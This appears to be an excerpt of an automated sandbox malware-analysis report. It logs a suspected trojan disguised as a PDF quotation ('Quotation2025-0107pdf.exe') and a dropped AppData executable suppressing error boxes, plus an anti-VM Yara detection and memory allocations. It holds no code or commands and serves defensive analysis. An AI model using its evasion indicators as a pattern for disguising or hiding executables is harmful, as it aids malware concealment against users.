Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 3260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 5780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 6780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 68B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 78B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: EAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: D3F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: FAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory allocated: 10AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: 4440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: 4A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: 5A60000 memory reserve \| memory write watch
